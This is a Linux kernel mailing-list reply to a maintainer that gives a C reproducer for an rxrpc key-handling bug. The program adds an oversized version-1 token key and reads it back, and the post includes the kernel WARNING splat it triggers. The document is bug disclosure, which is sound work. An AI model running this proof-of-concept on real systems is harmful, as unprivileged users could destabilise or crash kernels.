Re: [BUG] rxrpc: Client connection leak and BUG() call during kernel IO thread exit
From: Anderson Nascimento
Date: Wed Apr 22 2026 - 12:29:54 EST
Hi David,
On Wed, Apr 22, 2026 at 1:08 PM David Howells <dhowells@xxxxxxxxxx> wrote:
>
> Do you by any chance have a reproducer program for this?
Yes, you can find it below. The code is not polished, but it works.
> David
>
#include <stdio.h>
#include <string.h>
#include <keyutils.h>
/*
 * Header of the version-1 token that main() places in the "rxrpc" key
 * payload, directly after a 32-bit version word.
 * NOTE(review): this appears to mirror the kernel's own
 * struct rxrpc_key_data_v1; confirm the layout against the kernel headers
 * of the release under test.
 */
struct rxrpc_key_data_v1 {
/* Security class selector; main() sets it to 2. */
uint16_t security_index;
/* Number of bytes in ticket[] that follow the fixed header. */
uint16_t ticket_length;
/* Left at 0 by main() (the payload buffer is zero-filled). */
uint32_t expiry;
/* Set to 1 by main(). */
uint32_t kvno;
/* All-zero in this reproducer. */
uint8_t session_key[8];
/* Flexible array member: ticket bytes start right after the header. */
uint8_t ticket[];
};
/*
 * Ticket length announced in the header and appended to the payload.
 * NOTE(review): the message does not say why this particular value was
 * chosen; it is kept exactly as reported.
 */
#define TICKET_LENGTH 16349
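/*
 * Reproducer entry point: adds an "rxrpc" key holding a version-1 token to
 * the process keyring, then reads the key back with KEYCTL_READ.
 *
 * Payload passed to add_key():
 *   uint32_t kver (= 1) | struct rxrpc_key_data_v1 header | TICKET_LENGTH ticket bytes
 *
 * The kernel splat quoted in the report is raised on the read path
 * (keyctl_read_key -> rxrpc_read in the call trace), so the outcome of the
 * read is printed rather than treated as a failure of the program.
 *
 * Returns 1 if the key could not be added (nothing to read back), else 0.
 */
int main(int argc, char *argv[])
{
    const char *key_description = "afs@2";
    /* Zero-filled: expiry, session key and all ticket bytes stay 0. */
    char payload[16384 + 4 + 100] = {0};
    const uint32_t kver = 1;
    struct rxrpc_key_data_v1 hdr;
    size_t plen;
    key_serial_t key;
    long nread;

    (void)argc;
    (void)argv;

    /*
     * Build the header in a properly typed object and copy it in, instead
     * of writing through a struct pointer aimed at a char buffer (which is
     * not guaranteed to be suitably aligned and violates strict aliasing).
     */
    memset(&hdr, 0, sizeof(hdr));
    hdr.security_index = 2; /* presumably rxkad; confirm against kernel headers */
    hdr.ticket_length = TICKET_LENGTH;
    hdr.kvno = 1;

    memcpy(payload, &kver, sizeof(kver));
    memcpy(payload + sizeof(kver), &hdr, sizeof(hdr));
    /* The ticket itself is all zeroes and is already present in payload. */

    plen = sizeof(kver) + sizeof(hdr) + TICKET_LENGTH;

    key = add_key("rxrpc", key_description, payload, plen,
                  KEY_SPEC_PROCESS_KEYRING);
    if (key == -1) {
        /* Without a key the read below would only test an invalid serial. */
        perror("add_key");
        return 1;
    }

    /* Same buffer and 4096-byte length as the original report. */
    nread = keyctl(KEYCTL_READ, key, payload, 4096);
    if (nread < 0)
        perror("keyctl(KEYCTL_READ)");
    else
        printf("KEYCTL_READ returned %ld\n", nread);

    return 0;
}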
Running it generates the following WARNING splat in rxrpc_read().
[ 123.636173] ------------[ cut here ]------------
[ 123.636176] WARNING: CPU: 2 PID: 1528 at net/rxrpc/key.c:778
rxrpc_read+0x109/0x5c0 [rxrpc]
[ 123.636214] Modules linked in: fcrypt pcbc rxrpc ip6_udp_tunnel
krb5 udp_tunnel rfkill nft_fib_inet nft_fib_ipv4 nft_fib_ipv6 nft_fib
nft_reject_inet nf_reject_ipv4 nf_reject_ipv6 nft_reject nft_ct
nft_chain_nat nf_nat nf_conntrack nf_defrag_ipv6 nf_defrag_ipv4
nf_tables intel_rapl_msr intel_rapl_common
intel_uncore_frequency_common intel_pmc_core pmt_telemetry
pmt_discovery pmt_class qrtr intel_pmc_ssram_telemetry intel_vsec rapl
vmw_balloon sunrpc vmxnet3 i2c_piix4 i2c_smbus binfmt_misc joydev loop
dm_multipath nfnetlink zram lz4hc_compress lz4_compress
vmw_vsock_vmci_transport vsock vmw_vmci xfs nvme nvme_core
polyval_clmulni ghash_clmulni_intel nvme_keyring vmwgfx nvme_auth hkdf
drm_ttm_helper ata_generic pata_acpi ttm serio_raw scsi_dh_rdac
scsi_dh_emc scsi_dh_alua i2c_dev fuse
[ 123.636257] CPU: 2 UID: 1000 PID: 1528 Comm: poc Not tainted
6.18.13-200.fc43.x86_64 #1 PREEMPT(lazy)
[ 123.636259] Hardware name: VMware, Inc. VMware Virtual
Platform/440BX Desktop Reference Platform, BIOS 6.00 11/12/2020
[ 123.636260] RIP: 0010:rxrpc_read+0x109/0x5c0 [rxrpc]
[ 123.636284] Code: 03 66 83 f8 02 0f 85 5e 02 00 00 80 7b 02 00 74
9f f6 05 89 df 2a 00 04 0f 85 87 58 01 00 b8 28 00 00 00 b9 24 00 00
00 eb b1 <0f> 0b 48 c7 c0 fb ff ff ff 48 8b 54 24 40 65 48 2b 15 19 da
ea c3
[ 123.636285] RSP: 0018:ffffc9000274bc70 EFLAGS: 00010202
[ 123.636287] RAX: ffff8881082e0000 RBX: ffff888104a78e20 RCX: 0000000000000000
[ 123.636288] RDX: 0000000000000000 RSI: ffff88810aeac000 RDI: ffff8881037bf1f4
[ 123.636289] RBP: 0000000000004004 R08: 0000000000001000 R09: 0000000000000001
[ 123.636289] R10: 0000000000000004 R11: ffff88810aeac000 R12: 0000000000000010
[ 123.636290] R13: ffff88810aeac000 R14: 0000000000001000 R15: ffff8881023e9f00
[ 123.636291] FS: 00007f6f8611d740(0000) GS:ffff8882af726000(0000)
knlGS:0000000000000000
[ 123.636293] CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033
[ 123.636293] CR2: 00007fff0bf73000 CR3: 0000000108146006 CR4: 00000000003706f0
[ 123.636312] Call Trace:
[ 123.636314] <TASK>
[ 123.636316] ? keyctl_read_key+0xec/0x230
[ 123.636320] keyctl_read_key+0x131/0x230
[ 123.636322] do_syscall_64+0x7e/0x7f0
[ 123.636325] ? __folio_mod_stat+0x2d/0x90
[ 123.636328] ? set_ptes.isra.0+0x36/0x80
[ 123.636329] ? do_anonymous_page+0x100/0x520
[ 123.636332] ? __handle_mm_fault+0x551/0x6a0
[ 123.636334] ? count_memcg_events+0xd6/0x220
[ 123.636337] ? handle_mm_fault+0x248/0x360
[ 123.636339] ? do_user_addr_fault+0x21a/0x690
[ 123.636341] ? clear_bhb_loop+0x50/0xa0
[ 123.636344] ? clear_bhb_loop+0x50/0xa0
[ 123.636345] ? clear_bhb_loop+0x50/0xa0
[ 123.636346] ? clear_bhb_loop+0x50/0xa0
[ 123.636347] entry_SYSCALL_64_after_hwframe+0x76/0x7e
[ 123.636349] RIP: 0033:0x7f6f8621338d
[ 123.636356] Code: ff c3 66 2e 0f 1f 84 00 00 00 00 00 90 f3 0f 1e
fa 48 89 f8 48 89 f7 48 89 d6 48 89 ca 4d 89 c2 4d 89 c8 4c 8b 4c 24
08 0f 05 <48> 3d 01 f0 ff ff 73 01 c3 48 8b 0d 43 5a 0f 00 f7 d8 64 89
01 48
[ 123.636357] RSP: 002b:00007fff0bf70528 EFLAGS: 00000246 ORIG_RAX:
00000000000000fa
[ 123.636358] RAX: ffffffffffffffda RBX: 0000000000000000 RCX: 00007f6f8621338d
[ 123.636359] RDX: 00007fff0bf74640 RSI: 000000003809ba43 RDI: 000000000000000b
[ 123.636360] RBP: 00007fff0bf70600 R08: 00000000fffffffe R09: 0000003000000008
[ 123.636361] R10: 0000000000001000 R11: 0000000000000246 R12: 00007fff0bf787e8
[ 123.636362] R13: 0000000000000001 R14: 00007f6f86361000 R15: 0000000000402df0
[ 123.636364] </TASK>
[ 123.636365] ---[ end trace 0000000000000000 ]---
--
Anderson Nascimento
Allele Security Intelligence
https://www.allelesecurity.com